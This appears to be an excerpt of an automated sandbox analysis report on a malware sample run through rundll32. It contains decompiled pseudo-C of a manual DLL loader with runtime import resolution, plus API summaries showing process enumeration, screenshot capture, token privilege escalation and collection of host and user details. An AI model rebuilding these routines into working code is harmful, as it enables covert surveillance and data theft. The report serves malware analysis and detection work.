								__esp[2] =  *(__ebx + 0x26) & 0x0000ffff;
								__eax = __esp[0xb]();
								__edx =  *(__edi + 0x1e) & 0x0000ffff;
								 *(__ebx + 0x28) = __eax;
								__esp = __esp - 0xc;
								__esi =  *(__edi + 0x20);
								__eax = memcpy(__eax,  *(__edi + 0x20),  *(__edi + 0x1e) & 0x0000ffff);
								__esp[1] = 0x5c;
								__eax =  *(__edi + 0x20);
								 *__esp =  *(__edi + 0x20);
								__eax = wcsrchr(??, ??);
								__eflags = __eax;
								_t123 =  &(__eax[0]); // 0x2
								__esi = _t123;
								__ecx = __esp[0xd];
								if(__eax == 0) {
									__esi =  *(__edi + 0x20);
								}
								__edx = __esi;
								__edx = __esi -  *(__edi + 0x20);
								__eax =  *(__ebx + 0x28);
								__edi = __esp[0xa];
								__esp[0xb] = __ecx;
								__ecx = 0;
								 *(__eax + __edx) = __cx;
								__eax = wcscat(__eax, __esp[0xa]);
								__esp[1] = __esi;
								__eax =  *(__ebx + 0x28);
								 *__esp =  *(__ebx + 0x28);
								__eax = wcscat(??, ??);
								__ecx = __esp[0xb];
								__eax =  *(__ecx + 0x14);
								__edx = __ecx + 0x14;
								__eflags = __eax - __edx;
								if(__eax == __edx) {
									L37:
									__eax = __edx->dwMajorVersion;
									_t141 = __ebx + 8; // 0x8
									__edx = _t141;
									__esi = __eax[1];
									 *(__ebx + 8) = __eax;
									 *(__ebx + 0xc) = __esi;
									 *__esi = __edx;
									__eax[1] = __edx;
									__eax =  *(__ecx + 0x10);
									__edx = __ecx + 0xc;
									 *__ebx = __ecx + 0xc;
									__edx = __ecx + 0x1c;
									 *(__ebx + 4) = __eax;
									 *__eax = __ebx;
									__eax =  *(__ecx + 0x20);
									 *(__ecx + 0x10) = __ebx;
									__ebx = __ebx + 0x10;
									__eflags = __ebx;
									 *__ebx = __ecx + 0x1c;
									 *(__ebx + 4) = __eax;
									 *__eax = __ebx;
									 *(__ecx + 0x20) = __ebx;
									goto L38;
								} else {
									__esi = __esp[8];
									__eflags = __esp[8] - __eax[4];
									if(__esp[8] < __eax[4]) {
										L62:
										__edx = __eax;
										goto L37;
									}
									__esi = __esp[8];
									while(1) {
										__eax =  *__eax;
										__eflags = __eax - __edx;
										if(__eax == __edx) {
											goto L37;
										}
										__eflags = __esi - __eax[4];
										if(__esi < __eax[4]) {
											goto L62;
										}
									}
									goto L37;
								}
							}
						} else {
							__eflags = __edx;
							if(__edx == 0) {
								goto L58;
							}
							__edi = __ecx + __edx;
							__esi =  *__edi;
							__eflags = __esi;
							if(__esi == 0) {
								goto L24;
							}
							__edx = __ecx;
							__esp[0xe] = __ebp;
							__ebp = __ecx;
							__edx = __ecx - __eax;
							__eflags = __edx;
							__esp[0xb] = __edx;
							do {
								__eax =  *(__edi + 4);
								__esp[9] = __eax;
								__eax = __eax - 8;
								__eax = __eax >> 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L22;
								}
								_t48 =  &(__eax[2]); // 0x8664
								__ebx = __eax + _t48;
								__edx = __edi + 8;
								__esp[0xa] = __edi;
								__ebx = __eax + _t48 + __edi;
								__eflags = __ebx;
								__edi = __esp[0xb];
								do {
									__eax = __edx->dwOSVersionInfoSize & 0x0000ffff;
									__ecx = __eax;
									__cx = __cx >> 0xc;
									__eflags = __cx;
									if(__cx != 0) {
										__eax = __eax & 0x00000fff;
										__eax = __eax + __esi;
										_t52 = __eax + __ebp;
										 *_t52 =  *(__eax + __ebp) + __edi;
										__eflags =  *_t52;
									}
									__edx =  &(__edx->dwOSVersionInfoSize);
									__eflags = __edx - __ebx;
								} while (__edx != __ebx);
								__edi = __esp[0xa];
								L22:
								__edi = __edi + __esp[9];
								__esi =  *__edi;
								__eflags = __esi;
							} while (__esi != 0);
							__ebp = __esp[0xe];
							goto L24;
						}
					}
				}
				L1:
				return _t321;
			}

0x63c07f10
0x63c07f17
0x63c07f1e
0x63c07f22
0x63c07f26
0x63c07f28
0x63c07f2e
0x63c07f30
0x00000000
0x00000000
0x63c07f32
0x63c07f36
0x00000000
0x00000000
0x63c07f38
0x63c07f3b
0x63c07f42
0x63c07f44
0x63c07f48
0x63c07f4b
0x00000000
0x00000000
0x63c07f4d
0x63c07f55
0x63c07f5d
0x63c07f61
0x63c07f64
0x63c07f6a
0x63c07f6d
0x63c07f6f
0x63c07f72
0x63c07f74
0x63c07f78
0x63c084e3
0x63c08502
0x63c08504
0x63c08507
0x63c08509
0x63c0850d
0x00000000
0x00000000
0x00000000
0x63c08513
0x63c07f7e
0x63c07f7e
0x63c07f81
0x63c07f85
0x63c07f89
0x63c07f8d
0x63c07f90
0x63c07f95
0x63c07f99
0x63c07f9b
0x63c07f9f
0x63c08439
0x63c08450
0x63c08456
0x00000000
0x63c07fa5
0x63c07fa5
0x63c07fa9
0x63c07fa9
0x63c07fab
0x63c07faf
0x63c07fb3
0x63c07fb5
0x63c07fb7
0x63c07fc0
0x63c07fc0
0x63c07fc3
0x63c07fc6
0x63c07fc9
0x63c07fcc
0x63c07fcf
0x63c07fde
0x63c07fe3
0x63c07fe3
0x63c07fe9
0x63c07fed
0x63c07ff1
0x63c07ff8
0x63c07ffb
0x63c07ffd
0x63c08000
0x63c08003
0x63c08009
0x63c0800d
0x63c084d1
0x63c084d5
0x63c084d8
0x63c08013
0x63c08013
0x63c08016
0x63c08016
0x63c0801c
0x63c08020
0x63c08022
0x63c08094
0x63c08094
0x63c0809a
0x63c0809c
0x63c0809e
0x63c08824
0x63c08828
0x63c082e6
0x63c082e6
0x63c082ea
0x63c082ec
0x63c082ec
0x63c082f1
0x63c082f1
0x63c082f5
0x63c082fc
0x63c082ff
0x63c082ff
0x63c08304
0x63c08308
0x63c0830b
0x63c08313
0x63c0831b
0x63c08323
0x63c08327
0x63c0845e
0x63c08462
0x63c0846a
0x63c0846d
0x63c08473
0x63c08476
0x63c0832d
0x63c08338
0x63c0833e
0x63c08341
0x63c08341
0x63c08349
0x63c0834b
0x63c0834d
0x63c08351
0x63c08354
0x63c0835a
0x63c0835d
0x63c08360
0x63c08362
0x63c08366
0x63c08369
0x63c0836d
0x63c08373
0x63c08373
0x63c08360
0x63c08376
0x63c0837a
0x63c0837d
0x63c08384
0x63c08386
0x63c0838c
0x63c0838e
0x63c08390
0x63c08393
0x63c0839b
0x63c0839d
0x63c0839f
0x63c083a3
0x63c08541
0x63c08541
0x63c08545
0x63c0854d
0x63c0880f
0x63c0880f
0x63c08715
0x63c08715
0x63c08719
0x63c0871b
0x63c0871f
0x63c08762
0x63c08762
0x63c08765
0x63c0876d
0x63c08770
0x63c08775
0x63c0877b
0x63c0877d
0x63c08725
0x63c0872b
0x63c08794
0x63c0879a
0x63c0879d
0x63c0879f
0x63c0872d
0x63c0872d
0x63c08730
0x63c08733
0x63c08735
0x63c08735
0x63c0877f
0x63c0877f
0x63c08785
0x63c087a4
0x63c087a7
0x63c087aa
0x63c087ac
0x63c08787
0x63c08787
0x63c0878a
0x63c0878d
0x63c0878f
0x63c0878f
0x63c08785
0x63c08738
0x63c0873c
0x63c08740
0x63c08743
0x63c08746
0x63c08749
0x63c08751
0x63c08754
0x63c08757
0x63c08759
0x63c0875c
0x63c0875c
0x63c087b1
0x63c087b5
0x63c087b7
0x63c087bd
0x63c087c4
0x63c087c8
0x63c087c8
0x00000000
0x63c087b7
0x63c08553
0x63c08559
0x63c0855d
0x63c08561
0x63c08563
0x63c08566
0x63c08568
0x63c0856c
0x63c08570
0x63c08573
0x63c08576
0x63c08576
0x63c08579
0x63c0857b
0x63c0857d
0x63c0870d
0x63c0870d
0x00000000
0x63c0870d
0x63c08583
0x63c08585
0x63c08589
0x63c0859a
0x63c0859a
0x63c0859d
0x63c0859f
0x63c085a2
0x63c085a9
0x63c085ab
0x00000000
0x00000000
0x63c085ad
0x63c085b1
0x63c085b5
0x63c085b8
0x63c085be
0x63c085d7
0x63c085d9
0x63c085dc
0x63c085de
0x63c08831
0x00000000
0x63c08831
0x63c085e4
0x63c085e6
0x63c085eb
0x63c085ef
0x63c085f3
0x63c085f7
0x63c085fa
0x63c085fd
0x63c08600
0x63c08603
0x63c08606
0x63c08609
0x63c0860c
0x63c0860f
0x63c08612
0x63c08616
0x63c08618
0x63c0861c
0x63c0861f
0x63c08621
0x63c08624
0x63c08628
0x63c0862a
0x63c0862d
0x63c08590
0x63c08590
0x63c08592
0x63c08635
0x63c08637
0x63c0863b
0x63c0863d
0x00000000
0x00000000
0x63c08643
0x63c08648
0x63c0864c
0x63c08652
0x63c08656
0x63c08658
0x63c0866e
0x63c08670
0x63c08673
0x63c08675
0x63c08677
0x00000000
0x00000000
0x63c0867d
0x63c08681
0x63c08685
0x63c08688
0x63c0868c
0x63c08690
0x63c087dc
0x63c087dc
0x63c087de
0x00000000
0x00000000
0x63c087e0
0x63c087e3
0x63c087e5
0x63c087e7
0x63c08809
0x63c08809
0x63c0880b
0x63c0880d
0x00000000
0x00000000
0x63c087eb
0x63c087f3
0x63c087fb
0x63c087fb
0x63c087fe
0x63c08801
0x63c08804
0x63c08806
0x63c08806
0x00000000
0x63c08809
0x00000000
0x63c087e9
0x63c08696
0x63c0869a
0x63c0869e
0x63c086c5
0x63c086c5
0x63c086c7
0x63c086ca
0x63c086cd
0x63c086d3
0x63c086d7
0x63c086db
0x63c086de
0x63c086e2
0x63c086e5
0x63c086e7
0x63c086eb
0x63c086f3
0x63c086fa
0x63c086fc
0x63c086ff
0x63c08702
0x63c08705
0x63c08707
0x00000000
0x00000000
0x63c086a4
0x63c086b2
0x63c086b7
0x63c086bb
0x63c086bf
0x63c087d0
0x63c087d4
0x63c087d8
0x00000000
0x63c087d8
0x63c086bf
0x63c08709
0x00000000
0x63c08709
0x63c08598
0x63c08598
0x63c0859a
0x63c083a9
0x63c083ad
0x63c083b1
0x63c083b1
0x63c083b6
0x63c083bc
0x63c083bf
0x63c083c1
0x63c083c3
0x00000000
0x00000000
0x63c083c9
0x63c083cd
0x63c083d0
0x63c083d2
0x63c083d5
0x63c083d7
0x63c083d9
0x63c083dc
0x63c083de
0x63c083e0
0x63c083e2
0x63c08522
0x63c08522
0x63c08527
0x63c0852b
0x63c0852e
0x63c08530
0x00000000
0x00000000
0x63c08536
0x63c0853a
0x63c0853e
0x00000000
0x63c0853e
0x63c083e8
0x63c083ea
0x63c083ec
0x63c08430
0x63c08430
0x63c08432
0x63c083f0
0x63c083f0
0x63c083f2
0x00000000
0x00000000
0x63c083f8
0x63c083fc
0x00000000
0x00000000
0x63c08402
0x63c08402
0x63c08405
0x63c0840c
0x63c08412
0x63c08415
0x63c08417
0x63c08419
0x00000000
0x00000000
0x00000000
0x63c08419
0x63c08434
0x00000000
0x63c0841f
0x63c0841f
0x63c08422
0x63c08425
0x63c08428
0x63c08428
0x63c08520
0x00000000
0x63c08520
0x63c083b1
0x00000000
0x63c08386
0x63c080b7
0x63c080bd
0x63c080c0
0x63c080c2
0x63c080c6
0x63c080ca
0x63c080cd
0x63c080d0
0x63c080d6
0x63c080d8
0x63c080db
0x63c080de
0x63c080e1
0x63c080e6
0x63c080ea
0x63c080ef
0x63c080f3
0x63c080f6
0x63c080fd
0x63c08100
0x63c08102
0x63c08105
0x63c08107
0x63c08107
0x63c0810e
0x63c08112
0x63c08116
0x63c08118
0x63c08118
0x63c08118
0x63c08118
0x63c0811f
0x63c08123
0x63c08125
0x63c0812a
0x63c0812c
0x63c08130
0x63c08130
0x63c08130
0x63c08132
0x63c0813d
0x63c08143
0x63c08146
0x63c0814b
0x63c0848e
0x63c084a1
0x63c084a7
0x63c084a7
0x63c084aa
0x63c084b1
0x63c084b4
0x63c084b6
0x63c084b6
0x63c084b9
0x63c084bc
0x63c084bf
0x63c084c2
0x00000000
0x63c08151
0x63c08151
0x63c08483
0x63c08488
0x00000000
0x00000000
0x00000000
0x63c08488
0x63c08157
0x63c08157
0x63c0815d
0x63c08160
0x63c08163
0x63c08167
0x63c0816a
0x63c0816d
0x63c08170
0x63c08174
0x63c08186
0x63c0818c
0x63c08190
0x63c08193
0x63c08196
0x63c081a4
0x63c081b0
0x63c081b5
0x63c081b9
0x63c081bc
0x63c081c5
0x63c081c8
0x63c081cc
0x63c081d0
0x63c081dc
0x63c081df
0x63c081e4
0x63c081e8
0x63c081ec
0x63c081f0
0x63c081f6
0x63c081fe
0x63c08201
0x63c08205
0x63c08209
0x63c0820d
0x63c08210
0x63c08213
0x63c08221
0x63c08226
0x63c0822e
0x63c08231
0x63c08234
0x63c08239
0x63c0823b
0x63c0823b
0x63c0823e
0x63c08242
0x63c0881c
0x63c0881c
0x63c08248
0x63c0824a
0x63c0824d
0x63c08250
0x63c08254
0x63c08258
0x63c0825a
0x63c08265
0x63c0826a
0x63c0826e
0x63c08271
0x63c08274
0x63c08279
0x63c0827d
0x63c08280
0x63c08283
0x63c08285
0x63c082af
0x63c082af
0x63c082b2
0x63c082b2
0x63c082b5
0x63c082b8
0x63c082bb
0x63c082be
0x63c082c0
0x63c082c3
0x63c082c6
0x63c082c9
0x63c082cb
0x63c082ce
0x63c082d1
0x63c082d3
0x63c082d6
0x63c082d9
0x63c082d9
0x63c082dc
0x63c082de
0x63c082e1
0x63c082e3
0x00000000
0x63c08287
0x63c08287
0x63c0828b
0x63c0828e
0x63c084ca
0x63c084ca
0x00000000
0x63c084ca
0x63c08294
0x63c082a9
0x63c082a9
0x63c082ab
0x63c082ad
0x00000000
0x00000000
0x63c082a0
0x63c082a3
0x00000000
0x00000000
0x63c082a3
0x00000000
0x63c082a9
0x63c08285
0x63c08024
0x63c08024
0x63c08026
0x00000000
0x00000000
0x63c0802c
0x63c0802f
0x63c08031
0x63c08033
0x00000000
0x00000000
0x63c08035
0x63c08037
0x63c0803b
0x63c0803d
0x63c0803d
0x63c0803f
0x63c08043
0x63c08043
0x63c08046
0x63c0804a
0x63c0804d
0x63c0804d
0x63c0804f
0x00000000
0x00000000
0x63c08051
0x63c08051
0x63c08055
0x63c08058
0x63c0805c
0x63c0805c
0x63c0805e
0x63c08062
0x63c08062
0x63c08065
0x63c08067
0x63c0806b
0x63c0806e
0x63c08070
0x63c08075
0x63c08077
0x63c08077
0x63c08077
0x63c08077
0x63c0807b
0x63c0807e
0x63c0807e
0x63c08082
0x63c08086
0x63c08086
0x63c0808a
0x63c0808c
0x63c0808c
0x63c08090
0x00000000
0x63c08090
0x63c08022
0x63c07f9f
0x63c07ed8
0x63c07ee2

APIs

VirtualAlloc.KERNEL32 ref: 63C07F6D
memcpy.MSVCRT ref: 63C07F90
memcpy.MSVCRT ref: 63C07FDE
GetProcessHeap.KERNEL32 ref: 63C08094
HeapAlloc.KERNEL32 ref: 63C080B7
GetVersionExA.KERNEL32 ref: 63C0813D
HeapAlloc.KERNEL32 ref: 63C08186
memcpy.MSVCRT ref: 63C081A4
wcslen.MSVCRT ref: 63C081C0
wcslen.MSVCRT ref: 63C081D7
GetProcessHeap.KERNEL32 ref: 63C081F0
memcpy.MSVCRT ref: 63C08221
wcsrchr.MSVCRT ref: 63C08234
wcscat.MSVCRT ref: 63C08265
wcscat.MSVCRT ref: 63C08274
FindResourceA.KERNEL32 ref: 63C08338
CreateActCtxA.KERNEL32 ref: 63C08354
ActivateActCtx.KERNEL32 ref: 63C0836D
LoadLibraryA.KERNEL32 ref: 63C083B6
GetProcAddress.KERNEL32 ref: 63C0840C
VirtualFree.KERNEL32 ref: 63C08450
FindResourceA.KERNEL32 ref: 63C0846D
HeapAlloc.KERNEL32 ref: 63C084A1
VirtualAlloc.KERNEL32 ref: 63C08502
GetProcessHeap.KERNEL32 ref: 63C085BE
HeapAlloc.KERNEL32 ref: 63C085D7
HeapAlloc.KERNEL32 ref: 63C0866E
memcpy.MSVCRT ref: 63C086B2

Strings

@, xrefs: 63C07F4D
\, xrefs: 63C08226
, xrefs: 63C0830B

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 00232740, Relevance: 22.7, APIs: 15, Instructions: 170

APIs

CreateToolhelp32Snapshot.KERNEL32(?,?), ref: 00232767
Process32FirstW.KERNEL32 ref: 00232797
CloseHandle.KERNEL32 ref: 002327AA
calloc.MSVCRT ref: 002327D6
CloseHandle.KERNEL32 ref: 00232832
calloc.MSVCRT ref: 002328A7
free.MSVCRT ref: 002328DB
calloc.MSVCRT ref: 002328EB
free.MSVCRT ref: 00232908
Process32NextW.KERNEL32 ref: 0023291F
OpenProcess.KERNEL32 ref: 0023294D
GetModuleFileNameExW.PSAPI ref: 00232985
GetLastError.KERNEL32 ref: 00232990
GetModuleHandleW.KERNEL32 ref: 002329D7
GetProcAddress.KERNEL32 ref: 002329EF

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00234160, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 127

APIs

GetSystemMetrics.USER32 ref: 00234182
GetSystemMetrics.USER32 ref: 00234190
GetDC.USER32 ref: 0023419E
CreateCompatibleDC.GDI32 ref: 002341B9
CreateCompatibleBitmap.GDI32 ref: 002341DD
SelectObject.GDI32 ref: 002341F5
BitBlt.GDI32 ref: 00234235
DeleteObject.GDI32 ref: 00234249
GdipCreateBitmapFromHBITMAP.GDIPLUS ref: 0023429B

Part of subcall function 00234080: GdipGetImageEncodersSize.GDIPLUS ref: 002340AA
Part of subcall function 00234080: malloc.MSVCRT ref: 002340C1
Part of subcall function 00234080: GdipGetImageEncoders.GDIPLUS(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,002342C7), ref: 002340DF
Part of subcall function 00234080: wcscmp.MSVCRT ref: 00234107
Part of subcall function 00234080: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,002342C7), ref: 0023412E
Part of subcall function 00234080: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,002342C7), ref: 00234143

GdipSaveImageToFile.GDIPLUS ref: 00234332
GdipDisposeImage.GDIPLUS(?), ref: 00234350

Strings

, xrefs: 002341FE

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00230A70, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 85

APIs

GetCurrentThread.KERNEL32 ref: 00230A89
OpenThreadToken.ADVAPI32 ref: 00230AA8
LookupPrivilegeValueW.ADVAPI32 ref: 00230AD2
AdjustTokenPrivileges.ADVAPI32 ref: 00230B32
CloseHandle.KERNEL32 ref: 00230B48
GetLastError.KERNEL32 ref: 00230B60
ImpersonateSelf.ADVAPI32 ref: 00230B74
GetCurrentThread.KERNEL32 ref: 00230B81
OpenThreadToken.ADVAPI32 ref: 00230B9A
GetLastError.KERNEL32 ref: 00230BB2

Strings

(, xrefs: 00230B8F

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00232347, Relevance: 12.1, APIs: 8, Instructions: 107

APIs

GetDriveTypeW.KERNEL32 ref: 00232388
GetVolumeInformationW.KERNEL32 ref: 002323E7
GetDiskFreeSpaceExW.KERNEL32 ref: 0023240B
calloc.MSVCRT ref: 00232427
GetLastError.KERNEL32 ref: 00232440
realloc.MSVCRT ref: 002324B2
free.MSVCRT ref: 002324DC
free.MSVCRT ref: 002324F3

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00233270, Relevance: 12.1, APIs: 8, Instructions: 105

APIs

calloc.MSVCRT ref: 002332BA
GetUserNameExW.SECUR32 ref: 00233307
calloc.MSVCRT ref: 00233324
calloc.MSVCRT ref: 00233338
GetUserNameExW.SECUR32 ref: 00233352
realloc.MSVCRT ref: 0023339C
free.MSVCRT ref: 002333BF
free.MSVCRT ref: 002333C7

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00232DD0, Relevance: 7.6, APIs: 5, Instructions: 70

APIs

calloc.MSVCRT ref: 00232DF0
GetLocalTime.KERNEL32 ref: 00232DFE
GetTimeZoneInformation.KERNEL32 ref: 00232E0E
calloc.MSVCRT ref: 00232EB8
free.MSVCRT ref: 00232ED5

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C13870, Relevance: 7.6, APIs: 5, Instructions: 55

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 63C138BF
UnhandledExceptionFilter.KERNEL32 ref: 63C138CF
GetCurrentProcess.KERNEL32 ref: 63C138D8
TerminateProcess.KERNEL32 ref: 63C138E9
abort.MSVCRT ref: 63C138F2

Part of subcall function 63C14110: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,63C13938), ref: 63C14159
Part of subcall function 63C14110: InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,63C13938), ref: 63C14187

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 002357F0, Relevance: 7.6, APIs: 5, Instructions: 55

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0023583F
UnhandledExceptionFilter.KERNEL32 ref: 0023584F
GetCurrentProcess.KERNEL32 ref: 00235858
TerminateProcess.KERNEL32 ref: 00235869
abort.MSVCRT ref: 00235872

Part of subcall function 00236300: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,002358B8), ref: 00236349
Part of subcall function 00236300: InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,002358B8), ref: 00236377

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C137C0, Relevance: 7.6, APIs: 5, Instructions: 54

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 63C137F9
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,63C01449), ref: 63C1380A
GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,63C01449), ref: 63C13812
GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,63C01449), ref: 63C1381A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,63C01449), ref: 63C13829

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 63C1386C, Relevance: 7.5, APIs: 5, Instructions: 47

APIs

Part of subcall function 63C14110: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,63C13938), ref: 63C14159
Part of subcall function 63C14110: InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,63C13938), ref: 63C14187

SetUnhandledExceptionFilter.KERNEL32 ref: 63C138BF
UnhandledExceptionFilter.KERNEL32 ref: 63C138CF
GetCurrentProcess.KERNEL32 ref: 63C138D8
TerminateProcess.KERNEL32 ref: 63C138E9
abort.MSVCRT ref: 63C138F2

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 002357EC, Relevance: 7.5, APIs: 5, Instructions: 47

APIs

Part of subcall function 00236300: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,002358B8), ref: 00236349
Part of subcall function 00236300: InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,002358B8), ref: 00236377

SetUnhandledExceptionFilter.KERNEL32 ref: 0023583F
UnhandledExceptionFilter.KERNEL32 ref: 0023584F
GetCurrentProcess.KERNEL32 ref: 00235858
TerminateProcess.KERNEL32 ref: 00235869
abort.MSVCRT ref: 00235872

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C0724C, Relevance: 3.0, APIs: 2, Instructions: 36

C-Code - Quality: 25%

			E63C0724C(void* __eax, void* __ebx) {
				char* _t20;
				struct HINSTANCE__* _t22;
				_Unknown_base(*)()* _t23;
				struct HINSTANCE__* _t27;
				signed int _t33;
				struct HINSTANCE__* _t34;
				signed int _t39;
				struct HINSTANCE__** _t42;
				void* _t47;

				L5:
				while(1) {
					if(_t20 ==  *((intOrPtr*)(0x63c3a8c4 + _t33 * 8))) {
						goto L9;
					} else {
						L6:
						_t33 = _t33 + 1;
						_t34 =  *(0x63c3a8c0 + _t33 * 8);
						if(_t34 != 0) {
							continue;
						} else {
							L7:
							 *_t42 = E63C07170(_t20);
							_t27 = LoadLibraryA(??);
							_t42 = _t42 - 4;
							_t34 = _t27;
							if(_t27 == 0) {
								L13:
								return 0;
							} else {
								 *0x63C3A8C0 = _t34;
								 *0x63C3A8C4 =  *((intOrPtr*)(0x63c15004 + _t39 * 8));
								while(1) {
									L9:
									_t22 = E63C07170( *((intOrPtr*)(_t39 * 8 +  &E63C15000)));
									 *_t42 = _t34;
									_t42[1] = _t22;
									_t23 = GetProcAddress(??, ??);
									_t42 = _t42 - 8;
									 *(0x63c3a840 + _t39 * 4) = _t23;
									if(_t23 == 0) {
										goto L13;
									}
									_t39 = _t39 + 1;
									if(_t39 != 0x15) {
										_t20 =  *((intOrPtr*)(0x63c15004 + _t39 * 8));
										if(_t20 == 0) {
											_t34 = _t42[7];
											continue;
